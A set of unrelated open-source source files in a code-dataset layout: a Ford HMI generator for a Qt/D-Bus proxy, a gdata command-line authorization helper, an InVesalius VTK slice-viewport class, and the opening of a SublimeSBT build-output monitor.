# This file is a part of HMI D-Bus layer.
#
# Copyright (c) 2014, Ford Motor Company
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with the
# distribution.
#
# Neither the name of the Ford Motor Company nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR 'A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from argparse import ArgumentParser
import os.path
from sys import argv
from xml.etree import ElementTree
from copy import copy
from ford_xml_parser import FordXmlParser, ParamDesc
from code_formatter import CodeBlock
class Notifications_qml(FordXmlParser):
    """Generates the C++ ``SdlProxy`` glue class (header and source) that
    forwards SDL D-Bus notifications into QML as Qt signals.

    For every <notification> provided by "sdl" in the HMI API XML this emits:
      * a Qt signal carrying the notification parameters as QVariants, and
      * a private slot, connected to the matching D-Bus signal, that
        validates the incoming values and re-emits them as the Qt signal.

    NOTE: the recurring ``with CodeBlock(out) as out:`` idiom deliberately
    rebinds ``out`` to an indenting wrapper for the generated C++ code.
    """

    #Used for qt signal names, because qt signals cannot begin with a capital letter
    def first_letter_to_lower_case(self, s):
        if len(s) == 0:
            return s
        else:
            return s[0].lower() + s[1:]

    def make_header(self, out):
        """Writes the SdlProxy class declaration (signals + private slots)."""
        out.write("class SdlProxy: public Item {\n")
        with CodeBlock(out) as out:
            out.write("Q_OBJECT\n")
            out.write("Q_DISABLE_COPY(SdlProxy)\n")
            out.write("public:\n")
            out.write("explicit SdlProxy(Item* parent = 0);\n")
            out.write("private:\n")
            out.write("QDBusInterface *sdlBasicCommunicationInterface;\n")
            out.write("signals:\n")
            # One Qt signal per SDL-provided notification; all parameters are
            # exposed to QML as QVariant.
            for interface_el in self.el_tree.findall('interface'):
                iface_name = interface_el.get('name')
                notifications = self.find_notifications_by_provider(interface_el, "sdl")
                for notification_el in notifications:
                    with CodeBlock(out) as out:
                        out.write("void %s(" % self.first_letter_to_lower_case( notification_el.get("name")) )
                        param_el_count = 1
                        list_of_params = notification_el.findall("param")
                        list_of_params_len = len(list_of_params)
                        for param_el in list_of_params:
                            param = self.make_param_desc(param_el, iface_name)
                            out.write("QVariant %s" % param_el.get("name"))
                            # Comma between parameters, none after the last one.
                            if param_el_count < list_of_params_len:
                                out.write(", ")
                            param_el_count += 1
                        out.write(");\n")
        # One private slot per notification; these receive the strongly typed
        # D-Bus values (see qt_param_type).
        with CodeBlock(out) as out:
            out.write("private slots:\n")
            for interface_el in self.el_tree.findall('interface'):
                iface_name = interface_el.get('name')
                notifications = self.find_notifications_by_provider(interface_el, "sdl")
                for notification_el in notifications:
                    with CodeBlock(out) as out:
                        out.write("void slot_%s(" % notification_el.get("name"))
                        param_el_count = 1
                        list_of_params = notification_el.findall("param")
                        list_of_params_len = len(list_of_params)
                        for param_el in list_of_params:
                            param = self.make_param_desc(param_el, iface_name)
                            out.write("%s %s" % (self.qt_param_type(param), param_el.get("name")))
                            if param_el_count < list_of_params_len:
                                out.write(", ")
                            param_el_count += 1
                        out.write(");\n")
        out.write("};\n")

    def qt_param_type(self, param):
        """Returns the C++ type used for `param` in the D-Bus slot signature.

        Optional params are wrapped in OptionalArgument<>, arrays in QList<>
        (QStringList for string arrays); structs use the flattened
        ``Iface_Struct`` name. Raises RuntimeError on an unknown type.
        """
        if not param.mandatory:
            param_copy = copy(param)
            param_copy.mandatory = True
            return "OptionalArgument< " + self.qt_param_type(param_copy) + " >"
        if param.array:
            param_copy = copy(param)
            param_copy.array = False
            if param.type == 'String':
                return "QStringList"
            return "QList< " + self.qt_param_type(param_copy) + " >"
        if param.type == 'Integer' or param.enum:
            return 'int'
        elif param.type == 'String':
            return 'QString'
        elif param.type == 'Boolean':
            return 'bool'
        elif param.type == 'Float':
            return 'double'
        elif param.struct:
            return "_".join(param.fulltype)
        else:
            raise RuntimeError('Unknown type: ' + param.type)

    def qml_param_type(self, param):
        """Returns the C++ type used on the QML-facing side.

        Anything QML cannot represent natively (optionals, arrays, structs)
        degrades to QVariant. Raises RuntimeError on an unknown type.
        """
        if not param.mandatory:
            return "QVariant"
        if param.array:
            return "QVariant"
        if param.type == 'Integer' or param.enum:
            return 'int'
        elif param.type == 'String':
            return 'QString'
        elif param.type == 'Boolean':
            return 'bool'
        elif param.type == 'Float':
            return 'double'
        elif param.struct:
            return "QVariant"
        else:
            raise RuntimeError('Unknown type: ' + param.type)

    def make_source(self, out):
        """Writes the SdlProxy definition: the constructor that wires the
        D-Bus connections, plus one slot body per notification."""
        def qml_args(variable_name_needed):
            # Emits the slot's argument list. Relies on late binding: it reads
            # `notification_el`, `iface_name` and `out` from the enclosing
            # scope at call time, inside the loops below.
            param_el_count = 1
            list_of_params = notification_el.findall("param")
            list_of_params_len = len(list_of_params)
            for param_el in list_of_params:
                param = self.make_param_desc(param_el, iface_name)
                if variable_name_needed:
                    out.write("%s %s" % (self.qt_param_type(param), param_el.get("name")))
                else:
                    out.write("%s" % self.qt_param_type(param))
                if param_el_count < list_of_params_len:
                    out.write(", ")
                param_el_count += 1
        # Constructor: connect every SDL notification on the session bus to
        # its slot_<Name> handler.
        out.write("SdlProxy::SdlProxy(Item *parent): Item(parent) {\n")
        for interface_el in self.el_tree.findall('interface'):
            iface_name = interface_el.get('name')
            notifications = self.find_notifications_by_provider(interface_el, "sdl")
            for notification_el in notifications:
                notification_name = notification_el.get('name')
                with CodeBlock(out) as out:
                    out.write("QDBusConnection::sessionBus().connect(\n")
                    with CodeBlock(out) as out:
                        out.write("\"com.ford.sdl.core\", \"/\", \"com.ford.sdl.core.%s\",\n" % iface_name)
                        out.write("\"%s\", this, SLOT(slot_%s(" % (notification_name, notification_el.get("name")))
                        qml_args(variable_name_needed = False)
                        out.write(")));\n")
        out.write("}\n\n")
        # Slot bodies: convert each argument to QVariant, emit validation
        # code, then re-emit everything as the QML-facing Qt signal.
        for interface_el in self.el_tree.findall('interface'):
            iface_name = interface_el.get('name')
            notifications = self.find_notifications_by_provider(interface_el, "sdl")
            for notification_el in notifications:
                notific_full_name = interface_el.get("name") + "_" + notification_el.get("name")
                out.write("void SdlProxy::slot_%s(" % notification_el.get("name"))
                qml_args(variable_name_needed = True)
                out.write(") {\n")
                with CodeBlock(out) as out:
                    out.write("LOG4CXX_TRACE(logger_, \"ENTER\");\n\n")
                    for param_el in notification_el.findall("param"):
                        param = self.make_param_desc(param_el, iface_name)
                        tmp_param_name = param.name + "_qvariant"
                        out.write("QVariant %s;\n" % tmp_param_name)
                        out.write("%s = ValueToVariant(%s);\n" % (tmp_param_name, param.name))
                        self.write_param_validation(param, param.name, "\nLOG4CXX_ERROR(logger_, \"%s in %s out of bounds\")" % (param.name, notific_full_name), out)
                        out.write("\n")
                    out.write("emit %s(" % self.first_letter_to_lower_case( notification_el.get("name")) )
                    param_el_count = 1
                    list_of_params = notification_el.findall("param")
                    list_of_params_len = len(list_of_params)
                    for param_el in list_of_params:
                        param = self.make_param_desc(param_el, iface_name)
                        out.write("%s" % param.name + "_qvariant")
                        if param_el_count < list_of_params_len:
                            out.write(", ")
                        param_el_count += 1
                    out.write(");\n")
                with CodeBlock(out) as out:
                    out.write("LOG4CXX_TRACE(logger_, \"EXIT\");\n")
                out.write("}\n\n")

    def write_param_validation(self, param, param_name, fail_statement, out, level=0):
        """Emits C++ code that checks `param_name` against the restrictions
        declared for `param`, executing `fail_statement` on violation.

        Recurses into optional wrappers (``.presence``/``.val``), arrays
        (size bounds, then per-element checks) and struct members. `level`
        uniquifies the generated loop iterator names (``it_<level>``).
        """
        if not param.mandatory and (param.restricted or param.restrictedArray or (param.struct and any(map(lambda x: x.restricted, self.structs[param.fulltype])))):
            # Optional value: only validate when it is actually present.
            out.write("if (%s.presence) {\n" % param_name)
            param_copy = copy(param)
            param_copy.mandatory = True
            with CodeBlock(out) as out:
                self.write_param_validation(param_copy, param_name + ".val", fail_statement, out, level+1)
            out.write("}\n")
        elif param.array:
            if param.minSize > 0:
                out.write("if ({0}.count() < {1}) {{".format(param_name, param.minSize))
                with CodeBlock(out) as out:
                    out.write("{0};\n".format(fail_statement))
                out.write("}\n")
            if param.maxSize != None:
                out.write("if ({0}.count() > {1}) {{".format(param_name, param.maxSize))
                with CodeBlock(out) as out:
                    out.write("{0};\n".format(fail_statement))
                out.write("}\n")
            if param.restricted:
                # Validate every element of the array.
                out.write('for ({0}::const_iterator it_{2} = {1}.begin(); it_{2} != {1}.end(); ++it_{2}) {{\n'.format(self.qt_param_type(param), param_name, level))
                with CodeBlock(out) as out:
                    param_copy = copy(param)
                    param_copy.array = False
                    self.write_param_validation(param_copy, "(*it_{0})".format(level), fail_statement, out, level+1)
                out.write("}\n")
        elif param.struct:
            for p in self.structs[param.fulltype]:
                self.write_param_validation(p, "{0}.{1}".format(param_name, p.name), fail_statement, out, level+1)
        elif param.type == "Integer" or param.type == "Float":
            conditions = []
            if (param.minValue != None):
                conditions.append("(%s < %s)" % (param_name, param.minValue))
            if (param.maxValue != None):
                conditions.append("(%s > %s)" % (param_name, param.maxValue))
            if conditions:
                out.write('if (%s) {' % ' || '.join(conditions))
                with CodeBlock(out) as out:
                    out.write('%s;\n' % fail_statement)
                out.write("}\n")
        elif param.type == "String":
            conditions = []
            if (param.minLength > 0):
                conditions.append("(%s.size() < %s)" % (param_name, param.minLength))
            if (param.maxLength > 0):
                conditions.append("(%s.size() > %s)" % (param_name, param.maxLength))
            if conditions:
                out.write('if (%s) {' % ' || '.join(conditions))
                with CodeBlock(out) as out:
                    out.write('%s;\n' % (fail_statement))
                out.write("}\n")

#QVarian name;
#if (ttsName.presence) {
# ---------------------------------------------------------------------------
# Script entry: generate sdl_proxy.h / sdl_proxy.cc from the HMI API XML.
# ---------------------------------------------------------------------------
arg_parser = ArgumentParser(description="Generator of classes which Qt to QDbus C++ part")
arg_parser.add_argument('--infile', required=True, help="full name of input file, e.g. applink/src/components/interfaces/QT_HMI_API.xml")
arg_parser.add_argument('--version', required=False, help="Qt version 4.8.5 (default) or 5.1.0")
arg_parser.add_argument('--outdir', required=True, help="path to directory where output files request_to_sdl.h, request_to_sdl.cc will be saved")
args = arg_parser.parse_args()

# NOTE(review): these two settings are not used anywhere in this generator;
# they are kept for symmetry with the sibling make_* scripts. "5.1.0" and any
# unrecognized version previously selected identical values, so the two
# branches are merged.
if args.version == "4.8.5":
    prefix_class_item = 'Script'
    invoke_type_connection = 'Direct'
else:
    prefix_class_item = 'JS'
    invoke_type_connection = 'BlockingQueued'

header_name = 'sdl_proxy.h'
source_name = 'sdl_proxy.cc'

in_tree = ElementTree.parse(args.infile)
in_tree_root = in_tree.getroot()

impl = Notifications_qml(in_tree_root, 'com.ford.sdl.hmi')

# The same BSD notice is written at the top of both generated files (it was
# previously duplicated inline).
LICENSE_NOTICE = """
/*
Copyright (c) 2014, Ford Motor Company
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following
disclaimer in the documentation and/or other materials provided with the
distribution.
Neither the name of the Ford Motor Company nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR 'A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
*/
"""

# Fixed: the output files were never closed; `with` guarantees flush/close.
with open(os.path.join(args.outdir, header_name), "w") as header_out, \
     open(os.path.join(args.outdir, source_name), "w") as source_out:
    # --- header ------------------------------------------------------------
    header_out.write("// Warning! This file is generated by '%s'. Edit at your own risk.\n" % argv[0])
    header_out.write(LICENSE_NOTICE)
    header_out.write("#ifndef SRC_COMPONENTS_QT_HMI_QML_PLUGINS_DBUS_ADAPTER_SDL_PROXY_H_\n")
    header_out.write("#define SRC_COMPONENTS_QT_HMI_QML_PLUGINS_DBUS_ADAPTER_SDL_PROXY_H_\n\n")
    header_out.write("#include \"qml_dbus.h\"\n")
    header_out.write("#include \"qt_version.h\"\n\n")
    header_out.write("#include <QtCore/QVariant>\n")
    header_out.write("#include <QtDBus/QDBusInterface>\n")
    header_out.write("#if QT_4\n")
    header_out.write("#include <QtDeclarative/QDeclarativeItem>\n")
    header_out.write("typedef QDeclarativeItem Item;\n")
    header_out.write("#elif QT_5\n")
    header_out.write("#include <QtQuick/QQuickItem>\n")
    header_out.write("typedef QQuickItem Item;\n")
    header_out.write("#endif // QT_VERSION\n")
    impl.make_header(header_out)
    # Fixed: the closing comment previously said ..._REQUEST_TO_SDL_H_, which
    # did not match the #ifndef guard written above.
    header_out.write("#endif // SRC_COMPONENTS_QT_HMI_QML_PLUGINS_DBUS_ADAPTER_SDL_PROXY_H_")

    # --- source ------------------------------------------------------------
    source_out.write("// Warning! This file is generated by '%s'. Edit at your own risk.\n" % argv[0])
    source_out.write(LICENSE_NOTICE)
    source_out.write("#include \"sdl_proxy.h\"\n")
    source_out.write("#include \"utils/logger.h\"\n")
    source_out.write("CREATE_LOGGERPTR_GLOBAL(logger_, \"DBusPlugin\")\n\n")
    impl.make_source(source_out)
| bsd-3-clause |
google-code/android-scripting | python/gdata/src/gdata/sample_util.py | 133 | 7858 | #!/usr/bin/env python
#
# Copyright (C) 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Provides utility functions used with command line samples."""
# This module is used for version 2 of the Google Data APIs.
import sys
import getpass
import urllib
import gdata.gauth
__author__ = 'j.s@google.com (Jeff Scudder)'

# Authorization mechanisms accepted by authorize_client()'s `auth_type`.
CLIENT_LOGIN = 1
AUTHSUB = 2
OAUTH = 3
# OAuth signature methods accepted by authorize_client()'s `oauth_type`.
HMAC = 1
RSA = 2
def get_param(name, prompt='', secret=False, ask=True):
  """Fetches a named parameter from the command line or prompts for it.

  Accepts either ``--name=value`` or ``--name value`` on sys.argv. If the
  flag is absent and `ask` is true, the user is prompted interactively
  (with echo suppressed when `secret` is true).

  Args:
    name: str Parameter name, without the leading '--'.
    prompt: str Text displayed when prompting interactively.
    secret: bool Hide the typed value (for passwords).
    ask: bool Prompt when the flag is missing; otherwise return None.

  Returns:
    The parameter value as a string, or None when absent and ask is False.
  """
  # First, check for a command line parameter.
  for i in range(len(sys.argv)):
    if sys.argv[i].startswith('--%s=' % name):
      # Split on the first '=' only so values may themselves contain '='
      # (previously '--x=a=b' was truncated to 'a').
      return sys.argv[i].split('=', 1)[1]
    elif sys.argv[i] == '--%s' % name:
      return sys.argv[i + 1]
  if ask:
    # If it was not on the command line, ask the user to input the value.
    prompt = '%s: ' % prompt
    if secret:
      return getpass.getpass(prompt)
    else:
      return raw_input(prompt)  # Python 2 module; input() would eval here.
  else:
    return None
def authorize_client(client, auth_type=None, service=None, source=None,
                     scopes=None, oauth_type=None, consumer_key=None,
                     consumer_secret=None):
  """Uses command line arguments, or prompts user for token values.

  Python 2 only (print statements / raw_input). Any argument left as None
  is looked up on the command line via get_param() and, failing that,
  requested interactively. On success the obtained token is installed on
  `client.auth_token`; returns None on invalid auth/oauth type.
  """
  if auth_type is None:
    auth_type = int(get_param(
        'auth_type', 'Please choose the authorization mechanism you want'
        ' to use.\n'
        '1. to use your email address and password (ClientLogin)\n'
        '2. to use a web browser to visit an auth web page (AuthSub)\n'
        '3. if you have registed to use OAuth\n'))

  # Get the scopes for the services we want to access.
  if auth_type == AUTHSUB or auth_type == OAUTH:
    if scopes is None:
      scopes = get_param(
          'scopes', 'Enter the URL prefixes (scopes) for the resources you '
          'would like to access.\nFor multiple scope URLs, place a comma '
          'between each URL.\n'
          'Example: http://www.google.com/calendar/feeds/,'
          'http://www.google.com/m8/feeds/\n').split(',')
    elif isinstance(scopes, (str, unicode)):
      scopes = scopes.split(',')

  if auth_type == CLIENT_LOGIN:
    email = get_param('email', 'Please enter your username')
    password = get_param('password', 'Password', True)
    if service is None:
      service = get_param(
          'service', 'What is the name of the service you wish to access?'
          '\n(See list:'
          ' http://code.google.com/apis/gdata/faq.html#clientlogin)')
    if source is None:
      source = get_param('source', ask=False)
    client.client_login(email, password, source=source, service=service)
  elif auth_type == AUTHSUB:
    auth_sub_token = get_param('auth_sub_token', ask=False)
    session_token = get_param('session_token', ask=False)
    private_key = None
    auth_url = None
    single_use_token = None
    rsa_private_key = get_param(
        'rsa_private_key',
        'If you want to use secure mode AuthSub, please provide the\n'
        ' location of your RSA private key which corresponds to the\n'
        ' certificate you have uploaded for your domain. If you do not\n'
        ' have an RSA key, simply press enter')

    if rsa_private_key:
      try:
        private_key_file = open(rsa_private_key, 'rb')
        private_key = private_key_file.read()
        private_key_file.close()
      except IOError:
        # Fall through with private_key = None -> insecure AuthSub below.
        print 'Unable to read private key from file'

    if private_key is not None:
      # Secure-mode AuthSub: reuse an existing session/single-use token if
      # one was supplied, otherwise direct the user to an auth URL.
      if client.auth_token is None:
        if session_token:
          client.auth_token = gdata.gauth.SecureAuthSubToken(
              session_token, private_key, scopes)
          return
        elif auth_sub_token:
          client.auth_token = gdata.gauth.SecureAuthSubToken(
              auth_sub_token, private_key, scopes)
          client.upgrade_token()
          return
      auth_url = gdata.gauth.generate_auth_sub_url(
          'http://gauthmachine.appspot.com/authsub', scopes, True)
      print 'with a private key, get ready for this URL', auth_url
    else:
      # Insecure-mode AuthSub: same flow without request signing.
      if client.auth_token is None:
        if session_token:
          client.auth_token = gdata.gauth.AuthSubToken(session_token, scopes)
          return
        elif auth_sub_token:
          client.auth_token = gdata.gauth.AuthSubToken(auth_sub_token, scopes)
          client.upgrade_token()
          return
      auth_url = gdata.gauth.generate_auth_sub_url(
          'http://gauthmachine.appspot.com/authsub', scopes)

    print 'Visit the following URL in your browser to authorize this app:'
    print str(auth_url)
    print 'After agreeing to authorize the app, copy the token value from the'
    print ' URL. Example: "www.google.com/?token=ab12" token value is ab12'
    token_value = raw_input('Please enter the token value: ')
    if private_key is not None:
      single_use_token = gdata.gauth.SecureAuthSubToken(
          token_value, private_key, scopes)
    else:
      single_use_token = gdata.gauth.AuthSubToken(token_value, scopes)
    # Exchange the single-use token for a long-lived session token.
    client.auth_token = single_use_token
    client.upgrade_token()
  elif auth_type == OAUTH:
    if oauth_type is None:
      oauth_type = int(get_param(
          'oauth_type', 'Please choose the authorization mechanism you want'
          ' to use.\n'
          '1. use an HMAC signature using your consumer key and secret\n'
          '2. use RSA with your private key to sign requests\n'))
    consumer_key = get_param(
        'consumer_key', 'Please enter your OAuth conumer key '
        'which identifies your app')
    if oauth_type == HMAC:
      consumer_secret = get_param(
          'consumer_secret', 'Please enter your OAuth conumer secret '
          'which you share with the OAuth provider', True)
      # Swap out this code once the client supports requesting an oauth token.
      # Get a request token.
      request_token = client.get_oauth_token(
          scopes, 'http://gauthmachine.appspot.com/oauth', consumer_key,
          consumer_secret=consumer_secret)
    elif oauth_type == RSA:
      rsa_private_key = get_param(
          'rsa_private_key',
          'Please provide the location of your RSA private key which\n'
          ' corresponds to the certificate you have uploaded for your domain.')
      try:
        private_key_file = open(rsa_private_key, 'rb')
        private_key = private_key_file.read()
        private_key_file.close()
      except IOError:
        print 'Unable to read private key from file'

      request_token = client.get_oauth_token(
          scopes, 'http://gauthmachine.appspot.com/oauth', consumer_key,
          rsa_private_key=private_key)
    else:
      print 'Invalid OAuth signature type'
      return None

    # Authorize the request token in the browser.
    print 'Visit the following URL in your browser to authorize this app:'
    print str(request_token.generate_authorization_url())
    print 'After agreeing to authorize the app, copy URL from the browser\'s'
    print ' address bar.'
    url = raw_input('Please enter the url: ')
    gdata.gauth.authorize_request_token(request_token, url)
    # Exchange for an access token.
    client.auth_token = client.get_access_token(request_token)
  else:
    print 'Invalid authorization type.'
    return None
def print_options():
  """Displays usage information, available command line params."""
  # TODO: fill in the usage description for authorizing the client.
  # Placeholder: currently prints an empty line only.
  print ''
| apache-2.0 |
vhosouza/invesalius3 | invesalius/data/slice_data.py | 6 | 5990 | #--------------------------------------------------------------------------
# Software: InVesalius - Software de Reconstrucao 3D de Imagens Medicas
# Copyright: (C) 2001 Centro de Pesquisas Renato Archer
# Homepage: http://www.softwarepublico.gov.br
# Contact: invesalius@cti.gov.br
# License: GNU - GPL 2 (LICENSE.txt/LICENCA.txt)
#--------------------------------------------------------------------------
# Este programa e software livre; voce pode redistribui-lo e/ou
# modifica-lo sob os termos da Licenca Publica Geral GNU, conforme
# publicada pela Free Software Foundation; de acordo com a versao 2
# da Licenca.
#
# Este programa eh distribuido na expectativa de ser util, mas SEM
# QUALQUER GARANTIA; sem mesmo a garantia implicita de
# COMERCIALIZACAO ou de ADEQUACAO A QUALQUER PROPOSITO EM
# PARTICULAR. Consulte a Licenca Publica Geral GNU para obter mais
# detalhes.
#--------------------------------------------------------------------------
import vtk
import wx
import invesalius.constants as const
import invesalius.data.vtk_utils as vu
# Bit flags naming the borders of a slice viewport; combined with | and
# tested with & in SliceData.SetBorderStyle.
BORDER_UP = 1
BORDER_DOWN = 2
BORDER_LEFT = 4
BORDER_RIGHT = 8
BORDER_ALL = BORDER_UP | BORDER_DOWN | BORDER_LEFT | BORDER_RIGHT
BORDER_NONE = 0
class SliceData(object):
    """Bundles the VTK props for one 2D slice viewport: the slice actor, a
    cursor, the slice-number label and a four-line border box."""

    def __init__(self):
        self.actor = None             # main slice actor; assigned externally
        self.cursor = None            # current cursor object (see SetCursor)
        self.text = None              # slice-number label (created below)
        self.number = 0               # displayed slice number
        self.orientation = 'AXIAL'    # one of the const.ORIENTATION_COLOUR keys
        self.renderer = None          # renderers are wired up externally
        self.canvas_renderer = None
        self.overlay_renderer = None
        self.__create_text()
        self.__create_box()

    def __create_text(self):
        """Creates the slice-number label, coloured by orientation."""
        colour = const.ORIENTATION_COLOUR[self.orientation]
        text = vu.TextZero()
        text.SetColour(colour)
        text.SetSize(const.TEXT_SIZE_LARGE)
        text.SetPosition(const.TEXT_POS_LEFT_DOWN_ZERO)
        text.SetSymbolicSize(wx.FONTSIZE_LARGE)
        #text.SetVerticalJustificationToBottom()
        text.SetValue(self.number)
        self.text = text

    def __create_line_actor(self, line):
        """Wraps a vtkLineSource in a 2D mapper/actor pair."""
        line_mapper = vtk.vtkPolyDataMapper2D()
        line_mapper.SetInputConnection(line.GetOutputPort())
        line_actor = vtk.vtkActor2D()
        line_actor.SetMapper(line_mapper)
        return line_actor

    def __create_box(self):
        """Builds the four border lines and groups them in one assembly.

        The initial 0.1..200 extent is a placeholder; SetSize() resizes the
        lines to the actual viewport.
        """
        xi = yi = 0.1
        xf = yf = 200

        line_i = vtk.vtkLineSource()        # inferior (bottom) edge
        line_i.SetPoint1((xi, yi, 0))
        line_i.SetPoint2((xf, yi, 0))
        self.line_i = line_i
        self.line_i_actor = self.__create_line_actor(line_i)

        line_s = vtk.vtkLineSource()        # superior (top) edge
        line_s.SetPoint1((xi, yf, 0))
        line_s.SetPoint2((xf, yf, 0))
        self.line_s = line_s
        self.line_s_actor = self.__create_line_actor(line_s)

        line_l = vtk.vtkLineSource()        # left edge
        line_l.SetPoint1((xi, yi, 0))
        line_l.SetPoint2((xi, yf, 0))
        self.line_l = line_l
        self.line_l_actor = self.__create_line_actor(line_l)

        line_r = vtk.vtkLineSource()        # right edge
        line_r.SetPoint1((xf, yi, 0))
        line_r.SetPoint2((xf, yf, 0))
        self.line_r = line_r
        self.line_r_actor = self.__create_line_actor(line_r)

        box_actor = vtk.vtkPropAssembly()
        box_actor.AddPart(self.line_i_actor)
        box_actor.AddPart(self.line_s_actor)
        box_actor.AddPart(self.line_l_actor)
        box_actor.AddPart(self.line_r_actor)
        self.box_actor = box_actor

    def __set_border_colours(self, colours_borders):
        """Applies {colour: [actors]} to the border line actors."""
        for colour, actors in colours_borders.items():
            for actor in actors:
                actor.GetProperty().SetColor(colour)

    def SetBorderStyle(self, style=BORDER_NONE):
        """Colours the borders selected in the `style` bitmask with the
        orientation colour; all others are drawn white."""
        colour_e = const.ORIENTATION_COLOUR[self.orientation]   # "extern"
        colour_i = (1, 1, 1)                                    # "intern"
        extern_borders = []
        intern_borders = []
        if style & BORDER_UP:
            extern_borders.append(self.line_s_actor)
        else:
            intern_borders.append(self.line_s_actor)
        if style & BORDER_DOWN:
            extern_borders.append(self.line_i_actor)
        else:
            intern_borders.append(self.line_i_actor)
        if style & BORDER_LEFT:
            extern_borders.append(self.line_l_actor)
        else:
            intern_borders.append(self.line_l_actor)
        if style & BORDER_RIGHT:
            extern_borders.append(self.line_r_actor)
        else:
            intern_borders.append(self.line_r_actor)
        self.__set_border_colours({colour_i: intern_borders,
                                   colour_e: extern_borders})

    def SetCursor(self, cursor):
        """Replaces the current cursor actor on the overlay renderer."""
        if self.cursor:
            self.overlay_renderer.RemoveActor(self.cursor.actor)
        self.overlay_renderer.AddActor(cursor.actor)
        self.cursor = cursor

    def SetNumber(self, init, end=None):
        """Shows a single slice number, or a "first - last" range."""
        if end is None:
            self.number = init
            self.text.SetValue("%d" % self.number)
        else:
            self.number = init
            self.text.SetValue("%d - %d" % (init, end))
            self.text.SetPosition(const.TEXT_POS_LEFT_DOWN_ZERO)

    def SetOrientation(self, orientation):
        """Updates the orientation and recolours the label accordingly."""
        self.orientation = orientation
        colour = const.ORIENTATION_COLOUR[self.orientation]
        self.text.SetColour(colour)
        #self.box_actor.GetProperty().SetColor(colour)

    def SetSize(self, size):
        """Resizes the border box to a (width, height) viewport, with a
        0.1px inset so the lines stay visible at the edges."""
        w, h = size
        xi = yi = 0.1
        xf = w - 0.1
        yf = h - 0.1
        self.line_i.SetPoint1((xi, yi, 0))
        self.line_i.SetPoint2((xf, yi, 0))
        self.line_s.SetPoint1((xi, yf, 0))
        self.line_s.SetPoint2((xf, yf, 0))
        self.line_l.SetPoint1((xi, yi, 0))
        self.line_l.SetPoint2((xi, yf, 0))
        self.line_r.SetPoint1((xf, yi, 0))
        self.line_r.SetPoint2((xf, yf, 0))

    def Hide(self):
        # NOTE(review): Hide removes self.actor from overlay_renderer while
        # Show adds it to renderer — confirm this asymmetry is intentional.
        self.overlay_renderer.RemoveActor(self.actor)
        self.renderer.RemoveActor(self.text.actor)

    def Show(self):
        self.renderer.AddActor(self.actor)
        self.renderer.AddActor(self.text.actor)
| gpl-2.0 |
jarhart/SublimeSBT | outputmon.py | 1 | 5476 | try:
from .sbterror import SbtError
from .util import maybe
except(ValueError):
from sbterror import SbtError
from util import maybe
import re
class BuildOutputMonitor(object):
    """Incrementally consumes sbt output and drives the line parsers.

    Output arrives in arbitrary chunks that may end mid-line, so the trailing
    partial line is buffered and prepended to the next chunk.
    """

    def __init__(self, project):
        self.project = project
        # Order matters: the first parser whose start() yields claims the line.
        self._parsers = [ErrorParser, TestFailureParser, MultilineTestFailureParser,
                         FinishedParser]
        self._parser = None
        self._buffer = ''

    def __call__(self, output):
        pieces = re.split(r'(?:\r\n|\n|\r)', self._buffer + output)
        # The final piece has not seen its line terminator yet; keep it for
        # the next chunk. Everything before it is a complete line.
        self._buffer = pieces[-1]
        for piece in pieces[:-1]:
            self._output_line(self._strip_terminal_codes(piece))

    def _output_line(self, line):
        current = self._parser
        # A live parser consumes the line and returns the next parser state
        # (itself, or None when done); otherwise scan for a new parser.
        self._parser = current.parse(line) if current else self._start_parsing(line)

    def _start_parsing(self, line):
        for parser_class in self._parsers:
            for started in parser_class.start(self.project, line):
                return started
        return None

